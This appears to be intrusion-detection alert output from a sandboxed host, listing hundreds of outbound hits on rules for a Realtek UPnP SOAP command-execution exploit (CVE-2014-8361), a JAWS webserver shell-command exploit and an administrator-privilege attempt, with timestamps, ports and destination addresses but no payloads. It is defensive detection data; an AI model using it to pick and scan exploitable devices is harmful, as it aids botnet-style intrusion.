2024-11-28T07:28:32.345534+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34650	14.206.36.67	80	TCP
2024-11-28T07:28:32.351877+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	53776	196.163.229.29	80	TCP
2024-11-28T07:28:32.361157+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	45914	99.57.40.174	8080	TCP
2024-11-28T07:28:32.384417+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50310	119.24.183.33	8080	TCP
2024-11-28T07:28:32.392155+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49124	63.216.152.237	80	TCP
2024-11-28T07:28:32.392639+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	56276	58.13.152.91	8080	TCP
2024-11-28T07:28:32.398990+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50118	63.93.5.53	80	TCP
2024-11-28T07:28:32.414521+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34448	108.32.60.179	8080	TCP
2024-11-28T07:28:32.415172+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49580	20.60.103.147	80	TCP
2024-11-28T07:28:32.429916+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	39610	105.99.123.173	8080	TCP
2024-11-28T07:28:32.461346+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	48266	125.76.215.12	8080	TCP
2024-11-28T07:28:32.470806+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59062	152.17.230.207	80	TCP
2024-11-28T07:28:32.477965+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	57344	188.62.117.113	80	TCP
2024-11-28T07:28:32.486259+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	53220	191.108.27.83	80	TCP
2024-11-28T07:28:32.492816+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	32834	76.152.169.208	80	TCP
2024-11-28T07:28:32.492953+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	55076	65.55.17.33	8080	TCP
2024-11-28T07:28:32.508619+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	51846	166.252.165.142	8080	TCP
2024-11-28T07:28:32.518013+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	55176	78.194.76.189	80	TCP
2024-11-28T07:28:32.523802+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46208	98.140.243.164	8080	TCP
2024-11-28T07:28:32.533031+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	41004	145.189.228.46	80	TCP
2024-11-28T07:28:32.539852+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	52130	71.53.95.73	8080	TCP
2024-11-28T07:28:32.548657+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34854	176.190.233.75	8080	TCP
2024-11-28T07:28:32.554930+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	48530	121.133.146.20	8080	TCP
2024-11-28T07:28:32.595545+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49792	36.30.167.44	8080	TCP
2024-11-28T07:28:32.596301+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	40128	102.244.106.84	8080	TCP
2024-11-28T07:28:43.633718+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	44182	142.207.82.41	80	TCP
2024-11-28T07:28:43.799105+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50920	160.236.191.233	8080	TCP
2024-11-28T07:28:43.799141+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	35996	121.230.95.99	80	TCP
2024-11-28T07:28:43.924490+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	38054	109.85.10.60	8080	TCP
2024-11-28T07:28:43.924580+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	58886	51.218.144.20	8080	TCP
2024-11-28T07:28:43.930549+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49294	143.224.20.188	80	TCP
2024-11-28T07:28:44.711962+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	43560	70.21.24.212	8080	TCP
2024-11-28T07:28:44.814891+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34690	82.44.161.231	80	TCP
2024-11-28T07:28:45.471757+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	35288	211.126.112.179	8080	TCP
2024-11-28T07:28:46.712435+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37540	33.213.94.85	8080	TCP
2024-11-28T07:28:46.712444+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	38642	161.129.248.205	80	TCP
2024-11-28T07:28:46.727546+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	60292	88.23.72.85	80	TCP
2024-11-28T07:28:46.727631+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	36586	32.73.167.208	8080	TCP
2024-11-28T07:28:46.805526+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	40954	190.8.212.205	8080	TCP
2024-11-28T07:28:50.665274+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	48980	18.82.105.3	80	TCP
2024-11-28T07:28:50.696222+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37984	184.26.224.31	8080	TCP
2024-11-28T07:28:50.721249+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	45508	62.14.141.106	80	TCP
2024-11-28T07:28:50.774665+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	42174	143.139.168.148	80	TCP
2024-11-28T07:28:50.861934+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	38334	183.240.144.8	8080	TCP
2024-11-28T07:28:51.743318+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	42138	125.6.120.150	8080	TCP
2024-11-28T07:28:51.805860+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	54810	135.245.8.129	8080	TCP
2024-11-28T07:28:51.821461+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	41354	50.4.239.166	80	TCP
2024-11-28T07:28:51.940162+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	33592	81.57.162.159	80	TCP
2024-11-28T07:28:53.737232+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	33030	185.111.88.127	80	TCP
2024-11-28T07:28:53.799415+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	42938	191.222.250.184	80	TCP
2024-11-28T07:28:53.815097+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	54856	202.215.182.219	80	TCP
2024-11-28T07:28:53.846403+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	35458	125.168.142.96	80	TCP
2024-11-28T07:28:54.705744+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	55096	134.181.180.82	8080	TCP
2024-11-28T07:28:54.721642+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34662	120.74.8.15	80	TCP
2024-11-28T07:28:57.665367+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50550	89.195.203.162	8080	TCP
2024-11-28T07:28:57.665587+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	44310	7.197.38.114	80	TCP
2024-11-28T07:28:57.665671+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59058	214.55.27.251	8080	TCP
2024-11-28T07:28:57.743585+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	32836	132.49.66.157	8080	TCP
2024-11-28T07:28:58.727918+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	43916	222.208.184.50	80	TCP
2024-11-28T07:28:58.815360+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	42086	85.251.156.135	8080	TCP
2024-11-28T07:28:59.221679+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	55840	15.190.124.56	80	TCP
2024-11-28T07:29:00.706149+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	46224	135.53.13.211	8080	TCP
2024-11-28T07:29:00.712376+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	47476	92.139.107.125	80	TCP
2024-11-28T07:29:01.774893+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	51470	9.158.147.239	8080	TCP
2024-11-28T07:29:01.799625+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49872	91.224.230.66	80	TCP
2024-11-28T07:29:02.768350+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	33090	162.29.10.11	8080	TCP
2024-11-28T07:29:02.784158+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	48922	107.51.18.168	8080	TCP
2024-11-28T07:29:03.415666+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	48890	157.184.78.73	80	TCP
2024-11-28T07:29:03.817025+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	34620	191.143.159.171	8080	TCP
2024-11-28T07:29:04.665658+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49172	61.157.149.118	8080	TCP
2024-11-28T07:29:04.712408+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	50080	61.52.194.233	8080	TCP
2024-11-28T07:29:04.768525+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59186	203.55.84.100	8080	TCP
2024-11-28T07:29:05.784294+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59082	189.96.186.101	8080	TCP
2024-11-28T07:29:06.665845+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49574	140.158.65.199	8080	TCP
2024-11-28T07:29:06.674921+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	44240	51.93.70.197	80	TCP
2024-11-28T07:29:06.697874+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	36786	168.241.230.8	8080	TCP
2024-11-28T07:29:06.713198+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59722	172.158.193.226	8080	TCP
2024-11-28T07:29:06.759932+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	41926	171.169.146.157	8080	TCP
2024-11-28T07:29:07.712636+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	32792	135.114.48.83	8080	TCP
2024-11-28T07:29:07.790867+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	41852	86.150.230.141	80	TCP
2024-11-28T07:29:07.838367+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	41808	175.147.95.27	80	TCP
2024-11-28T07:29:09.721855+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	38690	80.152.5.18	80	TCP
2024-11-28T07:29:10.697142+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	38230	118.209.168.11	8080	TCP
2024-11-28T07:29:10.728179+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49478	163.150.75.77	8080	TCP
2024-11-28T07:29:10.775214+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	52794	16.185.70.74	8080	TCP
2024-11-28T07:29:11.400280+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	40010	73.187.21.113	80	TCP
2024-11-28T07:29:11.753465+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	58576	30.70.91.17	8080	TCP
2024-11-28T07:29:11.790790+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	59788	8.66.52.210	8080	TCP
2024-11-28T07:29:12.681512+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	48576	37.176.230.23	80	TCP
2024-11-28T07:29:12.722260+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	47522	168.216.177.236	80	TCP
2024-11-28T07:29:14.665925+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	39928	103.61.153.120	8080	TCP
2024-11-28T07:29:14.790951+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49378	171.191.190.114	80	TCP
2024-11-28T07:29:14.815868+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37800	217.160.23.25	80	TCP
2024-11-28T07:29:14.847079+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	49696	119.179.80.157	8080	TCP
2024-11-28T07:29:15.619050+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	58950	5.197.254.35	80	TCP
2024-11-28T07:29:15.728325+0100	2027063	1	Attempted Administrator Privilege Gain	192.168.2.23	37824	34.173.168.24	80	TCP

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T07:28:09.508432+0100	2027339	1	A Network Trojan was detected	192.168.2.23	34298	97.91.236.206	52869	TCP
2024-11-28T07:28:09.509504+0100	2027339	1	A Network Trojan was detected	192.168.2.23	44886	101.189.50.38	52869	TCP
2024-11-28T07:28:09.514641+0100	2027339	1	A Network Trojan was detected	192.168.2.23	37608	73.230.184.19	52869	TCP
2024-11-28T07:28:09.517564+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49060	121.95.76.250	52869	TCP
2024-11-28T07:28:09.556969+0100	2027339	1	A Network Trojan was detected	192.168.2.23	53386	58.189.121.169	52869	TCP
2024-11-28T07:28:09.565198+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48832	106.222.158.5	52869	TCP
2024-11-28T07:28:09.573975+0100	2027339	1	A Network Trojan was detected	192.168.2.23	56834	152.0.87.200	52869	TCP
2024-11-28T07:28:09.575683+0100	2027339	1	A Network Trojan was detected	192.168.2.23	47196	100.49.226.162	52869	TCP
2024-11-28T07:28:09.576795+0100	2027339	1	A Network Trojan was detected	192.168.2.23	60498	68.101.86.227	52869	TCP
2024-11-28T07:28:09.577889+0100	2027339	1	A Network Trojan was detected	192.168.2.23	34698	124.127.132.57	52869	TCP
2024-11-28T07:28:09.578350+0100	2027339	1	A Network Trojan was detected	192.168.2.23	47266	3.111.24.133	52869	TCP
2024-11-28T07:28:09.580120+0100	2027339	1	A Network Trojan was detected	192.168.2.23	60268	128.39.179.200	52869	TCP
2024-11-28T07:28:09.583055+0100	2027339	1	A Network Trojan was detected	192.168.2.23	50614	215.230.56.175	52869	TCP
2024-11-28T07:28:09.584518+0100	2027339	1	A Network Trojan was detected	192.168.2.23	34526	68.169.46.188	52869	TCP
2024-11-28T07:28:09.585256+0100	2027339	1	A Network Trojan was detected	192.168.2.23	36296	24.168.141.210	52869	TCP
2024-11-28T07:28:09.586352+0100	2027339	1	A Network Trojan was detected	192.168.2.23	46276	60.61.74.47	52869	TCP
2024-11-28T07:28:09.587816+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43986	85.206.232.118	52869	TCP
2024-11-28T07:28:09.588946+0100	2027339	1	A Network Trojan was detected	192.168.2.23	38618	126.210.97.150	52869	TCP
2024-11-28T07:28:09.601694+0100	2027339	1	A Network Trojan was detected	192.168.2.23	35628	178.233.21.105	52869	TCP
2024-11-28T07:28:09.610296+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43418	132.20.246.253	52869	TCP
2024-11-28T07:28:09.611404+0100	2027339	1	A Network Trojan was detected	192.168.2.23	39538	111.150.127.171	52869	TCP
2024-11-28T07:28:21.512644+0100	2027339	1	A Network Trojan was detected	192.168.2.23	35108	38.7.77.71	52869	TCP
2024-11-28T07:28:21.513375+0100	2027339	1	A Network Trojan was detected	192.168.2.23	46152	195.214.23.156	52869	TCP
2024-11-28T07:28:21.552351+0100	2027339	1	A Network Trojan was detected	192.168.2.23	44560	157.237.189.119	52869	TCP
2024-11-28T07:28:21.553970+0100	2027339	1	A Network Trojan was detected	192.168.2.23	37510	159.175.193.207	52869	TCP
2024-11-28T07:28:21.556333+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49390	44.237.251.105	52869	TCP
2024-11-28T07:28:21.564582+0100	2027339	1	A Network Trojan was detected	192.168.2.23	60674	220.112.244.93	52869	TCP
2024-11-28T07:28:21.565316+0100	2027339	1	A Network Trojan was detected	192.168.2.23	55736	164.49.37.152	52869	TCP
2024-11-28T07:28:21.569392+0100	2027339	1	A Network Trojan was detected	192.168.2.23	50770	9.15.166.129	52869	TCP
2024-11-28T07:28:21.571632+0100	2027339	1	A Network Trojan was detected	192.168.2.23	55040	217.112.237.238	52869	TCP
2024-11-28T07:28:21.585340+0100	2027339	1	A Network Trojan was detected	192.168.2.23	42546	110.87.214.87	52869	TCP
2024-11-28T07:28:21.587227+0100	2027339	1	A Network Trojan was detected	192.168.2.23	42708	110.69.45.221	52869	TCP
2024-11-28T07:28:21.589416+0100	2027339	1	A Network Trojan was detected	192.168.2.23	60934	49.174.147.72	52869	TCP
2024-11-28T07:28:21.594672+0100	2027339	1	A Network Trojan was detected	192.168.2.23	56744	143.251.2.198	52869	TCP
2024-11-28T07:28:21.595034+0100	2027339	1	A Network Trojan was detected	192.168.2.23	59388	92.61.151.177	52869	TCP
2024-11-28T07:28:21.596156+0100	2027339	1	A Network Trojan was detected	192.168.2.23	59942	134.101.144.103	52869	TCP
2024-11-28T07:28:21.606492+0100	2027339	1	A Network Trojan was detected	192.168.2.23	55058	156.94.30.236	52869	TCP
2024-11-28T07:28:21.607585+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43144	61.177.7.93	52869	TCP
2024-11-28T07:28:27.038744+0100	2027339	1	A Network Trojan was detected	192.168.2.23	53326	93.186.174.180	52869	TCP
2024-11-28T07:28:32.510348+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48672	142.101.125.225	52869	TCP
2024-11-28T07:28:32.517842+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43596	101.192.66.201	52869	TCP
2024-11-28T07:28:33.516616+0100	2027339	1	A Network Trojan was detected	192.168.2.23	59292	149.95.199.111	52869	TCP
2024-11-28T07:28:33.535229+0100	2027339	1	A Network Trojan was detected	192.168.2.23	41596	63.102.108.227	52869	TCP
2024-11-28T07:28:33.552982+0100	2027339	1	A Network Trojan was detected	192.168.2.23	40688	66.249.103.227	52869	TCP
2024-11-28T07:28:33.583337+0100	2027339	1	A Network Trojan was detected	192.168.2.23	38308	13.21.253.174	52869	TCP
2024-11-28T07:28:33.594193+0100	2027339	1	A Network Trojan was detected	192.168.2.23	51644	1.58.155.9	52869	TCP
2024-11-28T07:28:35.512344+0100	2027339	1	A Network Trojan was detected	192.168.2.23	57494	44.61.47.138	52869	TCP
2024-11-28T07:28:35.514971+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49770	70.243.229.26	52869	TCP
2024-11-28T07:28:39.556042+0100	2027339	1	A Network Trojan was detected	192.168.2.23	44266	79.199.27.108	52869	TCP
2024-11-28T07:28:39.602566+0100	2027339	1	A Network Trojan was detected	192.168.2.23	47708	203.100.248.56	52869	TCP
2024-11-28T07:28:40.573842+0100	2027339	1	A Network Trojan was detected	192.168.2.23	34598	34.213.210.180	52869	TCP
2024-11-28T07:28:42.563452+0100	2027339	1	A Network Trojan was detected	192.168.2.23	55110	81.190.51.197	52869	TCP
2024-11-28T07:28:42.563855+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48712	119.101.39.151	52869	TCP
2024-11-28T07:28:43.504933+0100	2027339	1	A Network Trojan was detected	192.168.2.23	37160	29.92.118.209	52869	TCP
2024-11-28T07:28:43.521673+0100	2027339	1	A Network Trojan was detected	192.168.2.23	46500	41.43.231.175	52869	TCP
2024-11-28T07:28:43.528472+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43048	51.247.156.30	52869	TCP
2024-11-28T07:28:43.551494+0100	2027339	1	A Network Trojan was detected	192.168.2.23	55180	157.239.141.244	52869	TCP
2024-11-28T07:28:47.599170+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43088	39.223.91.158	52869	TCP
2024-11-28T07:28:49.557030+0100	2027339	1	A Network Trojan was detected	192.168.2.23	47942	221.173.12.196	52869	TCP
2024-11-28T07:28:49.593152+0100	2027339	1	A Network Trojan was detected	192.168.2.23	41238	142.17.17.10	52869	TCP
2024-11-28T07:28:50.363914+0100	2027339	1	A Network Trojan was detected	192.168.2.23	57764	125.157.58.6	52869	TCP
2024-11-28T07:28:50.516978+0100	2027339	1	A Network Trojan was detected	192.168.2.23	41932	222.245.158.55	52869	TCP
2024-11-28T07:28:52.510632+0100	2027339	1	A Network Trojan was detected	192.168.2.23	44658	178.24.36.113	52869	TCP
2024-11-28T07:28:52.517949+0100	2027339	1	A Network Trojan was detected	192.168.2.23	36688	28.188.164.28	52869	TCP
2024-11-28T07:28:52.562638+0100	2027339	1	A Network Trojan was detected	192.168.2.23	46634	133.74.160.165	52869	TCP
2024-11-28T07:28:52.570782+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43014	187.247.135.38	52869	TCP
2024-11-28T07:28:53.520880+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48404	27.90.100.164	52869	TCP
2024-11-28T07:28:53.526321+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49056	133.48.250.90	52869	TCP
2024-11-28T07:28:53.534446+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48866	101.203.138.45	52869	TCP
2024-11-28T07:28:54.506607+0100	2027339	1	A Network Trojan was detected	192.168.2.23	44284	111.66.217.99	52869	TCP
2024-11-28T07:28:54.567836+0100	2027339	1	A Network Trojan was detected	192.168.2.23	42338	204.136.100.108	52869	TCP
2024-11-28T07:28:54.573370+0100	2027339	1	A Network Trojan was detected	192.168.2.23	38952	64.200.234.195	52869	TCP
2024-11-28T07:28:55.526468+0100	2027339	1	A Network Trojan was detected	192.168.2.23	43632	220.171.241.164	52869	TCP
2024-11-28T07:28:56.585498+0100	2027339	1	A Network Trojan was detected	192.168.2.23	40282	174.128.4.193	52869	TCP
2024-11-28T07:28:56.585896+0100	2027339	1	A Network Trojan was detected	192.168.2.23	55022	30.218.46.134	52869	TCP
2024-11-28T07:28:56.587448+0100	2027339	1	A Network Trojan was detected	192.168.2.23	37064	26.125.153.6	52869	TCP
2024-11-28T07:28:56.588218+0100	2027339	1	A Network Trojan was detected	192.168.2.23	59182	218.211.40.19	52869	TCP
2024-11-28T07:28:56.597734+0100	2027339	1	A Network Trojan was detected	192.168.2.23	54210	65.121.9.196	52869	TCP
2024-11-28T07:28:58.565488+0100	2027339	1	A Network Trojan was detected	192.168.2.23	58724	142.106.108.67	52869	TCP
2024-11-28T07:28:59.572102+0100	2027339	1	A Network Trojan was detected	192.168.2.23	58134	179.253.217.218	52869	TCP
2024-11-28T07:28:59.606587+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49612	49.191.213.85	52869	TCP
2024-11-28T07:29:00.544013+0100	2027339	1	A Network Trojan was detected	192.168.2.23	42416	1.125.226.174	52869	TCP
2024-11-28T07:29:01.598071+0100	2027339	1	A Network Trojan was detected	192.168.2.23	50190	186.191.62.146	52869	TCP
2024-11-28T07:29:02.543768+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48104	55.105.12.37	52869	TCP
2024-11-28T07:29:02.598535+0100	2027339	1	A Network Trojan was detected	192.168.2.23	50454	70.228.92.212	52869	TCP
2024-11-28T07:29:06.587357+0100	2027339	1	A Network Trojan was detected	192.168.2.23	48996	110.143.39.112	52869	TCP
2024-11-28T07:29:07.512665+0100	2027339	1	A Network Trojan was detected	192.168.2.23	57994	143.177.72.127	52869	TCP
2024-11-28T07:29:07.566059+0100	2027339	1	A Network Trojan was detected	192.168.2.23	58578	129.107.129.250	52869	TCP
2024-11-28T07:29:08.501428+0100	2027339	1	A Network Trojan was detected	192.168.2.23	41880	124.95.166.239	52869	TCP
2024-11-28T07:29:08.556257+0100	2027339	1	A Network Trojan was detected	192.168.2.23	60756	119.16.76.135	52869	TCP
2024-11-28T07:29:08.607699+0100	2027339	1	A Network Trojan was detected	192.168.2.23	34838	120.120.252.149	52869	TCP
2024-11-28T07:29:09.590425+0100	2027339	1	A Network Trojan was detected	192.168.2.23	42540	161.166.217.95	52869	TCP
2024-11-28T07:29:09.596128+0100	2027339	1	A Network Trojan was detected	192.168.2.23	47822	204.43.222.73	52869	TCP
2024-11-28T07:29:10.503247+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49850	89.162.48.22	52869	TCP
2024-11-28T07:29:10.506163+0100	2027339	1	A Network Trojan was detected	192.168.2.23	49236	185.72.198.249	52869	TCP
2024-11-28T07:29:11.547905+0100	2027339	1	A Network Trojan was detected	192.168.2.23	53664	55.43.200.245	52869	TCP
2024-11-28T07:29:11.558233+0100	2027339	1	A Network Trojan was detected	192.168.2.23	45792	30.254.21.175	52869	TCP
2024-11-28T07:29:13.507687+0100	2027339	1	A Network Trojan was detected	192.168.2.23	39324	101.138.184.62	52869	TCP
2024-11-28T07:29:13.582171+0100	2027339	1	A Network Trojan was detected	192.168.2.23	42534	57.127.194.62	52869	TCP
2024-11-28T07:29:14.582090+0100	2027339	1	A Network Trojan was detected	192.168.2.23	51958	134.42.195.114	52869	TCP

ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T07:28:01.309854+0100	2030092	1	Web Application Attack	192.168.2.23	38690	177.200.207.58	80	TCP
2024-11-28T07:28:09.517185+0100	2030092	1	Web Application Attack	192.168.2.23	32980	122.187.139.190	80	TCP
2024-11-28T07:28:09.517913+0100	2030092	1	Web Application Attack	192.168.2.23	49366	177.120.79.8	80	TCP
2024-11-28T07:28:09.521249+0100	2030092	1	Web Application Attack	192.168.2.23	52188	117.244.40.134	80	TCP
2024-11-28T07:28:09.531008+0100	2030092	1	Web Application Attack	192.168.2.23	46784	97.137.41.211	80	TCP
2024-11-28T07:28:09.538595+0100	2030092	1	Web Application Attack	192.168.2.23	46444	55.164.19.178	80	TCP
2024-11-28T07:28:09.539729+0100	2030092	1	Web Application Attack	192.168.2.23	54768	76.160.156.242	80	TCP
2024-11-28T07:28:09.550269+0100	2030092	1	Web Application Attack	192.168.2.23	58860	95.213.81.21	80	TCP
2024-11-28T07:28:09.563305+0100	2030092	1	Web Application Attack	192.168.2.23	55714	122.248.149.165	80	TCP
2024-11-28T07:28:09.563673+0100	2030092	1	Web Application Attack	192.168.2.23	33160	192.97.26.236	80	TCP
2024-11-28T07:28:09.566819+0100	2030092	1	Web Application Attack	192.168.2.23	56816	107.227.55.144	80	TCP
2024-11-28T07:28:09.568190+0100	2030092	1	Web Application Attack	192.168.2.23	50024	179.251.32.251	80	TCP
2024-11-28T07:28:09.568935+0100	2030092	1	Web Application Attack	192.168.2.23	60514	158.166.4.165	80	TCP
2024-11-28T07:28:09.576047+0100	2030092	1	Web Application Attack	192.168.2.23	41996	161.154.233.90	80	TCP
2024-11-28T07:28:09.590266+0100	2030092	1	Web Application Attack	192.168.2.23	57590	118.79.188.67	80	TCP
2024-11-28T07:28:09.596002+0100	2030092	1	Web Application Attack	192.168.2.23	48870	129.46.212.84	80	TCP
2024-11-28T07:28:09.603928+0100	2030092	1	Web Application Attack	192.168.2.23	46988	157.96.102.17	80	TCP
2024-11-28T07:28:09.612885+0100	2030092	1	Web Application Attack	192.168.2.23	49652	50.196.185.72	80	TCP
2024-11-28T07:28:13.340343+0100	2030092	1	Web Application Attack	192.168.2.23	53954	202.178.119.161	80	TCP
2024-11-28T07:28:13.515361+0100	2030092	1	Web Application Attack	192.168.2.23	39418	200.13.149.223	80	TCP
2024-11-28T07:28:21.511922+0100	2030092	1	Web Application Attack	192.168.2.23	56232	86.252.168.14	80	TCP
2024-11-28T07:28:21.513739+0100	2030092	1	Web Application Attack	192.168.2.23	36014	133.133.78.165	80	TCP
2024-11-28T07:28:21.515221+0100	2030092	1	Web Application Attack	192.168.2.23	43430	164.167.9.70	80	TCP
2024-11-28T07:28:21.520709+0100	2030092	1	Web Application Attack	192.168.2.23	58726	2.243.56.199	80	TCP
2024-11-28T07:28:21.523657+0100	2030092	1	Web Application Attack	192.168.2.23	48998	182.151.249.38	80	TCP
2024-11-28T07:28:21.529223+0100	2030092	1	Web Application Attack	192.168.2.23	58060	148.76.110.167	80	TCP
2024-11-28T07:28:21.530684+0100	2030092	1	Web Application Attack	192.168.2.23	60216	87.41.98.96	80	TCP
2024-11-28T07:28:21.532539+0100	2030092	1	Web Application Attack	192.168.2.23	57606	53.189.162.142	80	TCP
2024-11-28T07:28:21.540611+0100	2030092	1	Web Application Attack	192.168.2.23	52716	22.32.12.201	80	TCP
2024-11-28T07:28:21.542832+0100	2030092	1	Web Application Attack	192.168.2.23	33348	71.241.194.217	80	TCP
2024-11-28T07:28:21.543947+0100	2030092	1	Web Application Attack	192.168.2.23	37600	20.191.233.24	80	TCP
2024-11-28T07:28:21.546184+0100	2030092	1	Web Application Attack	192.168.2.23	34870	11.3.1.179	80	TCP
2024-11-28T07:28:21.546541+0100	2030092	1	Web Application Attack	192.168.2.23	36954	94.134.209.196	80	TCP
2024-11-28T07:28:21.548453+0100	2030092	1	Web Application Attack	192.168.2.23	53048	16.34.243.125	80	TCP
2024-11-28T07:28:21.549948+0100	2030092	1	Web Application Attack	192.168.2.23	41894	121.122.226.155	80	TCP
2024-11-28T07:28:21.555548+0100	2030092	1	Web Application Attack	192.168.2.23	52534	16.156.233.47	80	TCP
2024-11-28T07:28:21.561666+0100	2030092	1	Web Application Attack	192.168.2.23	60262	79.141.55.107	80	TCP
2024-11-28T07:28:21.563479+0100	2030092	1	Web Application Attack	192.168.2.23	53202	123.87.2.237	80	TCP
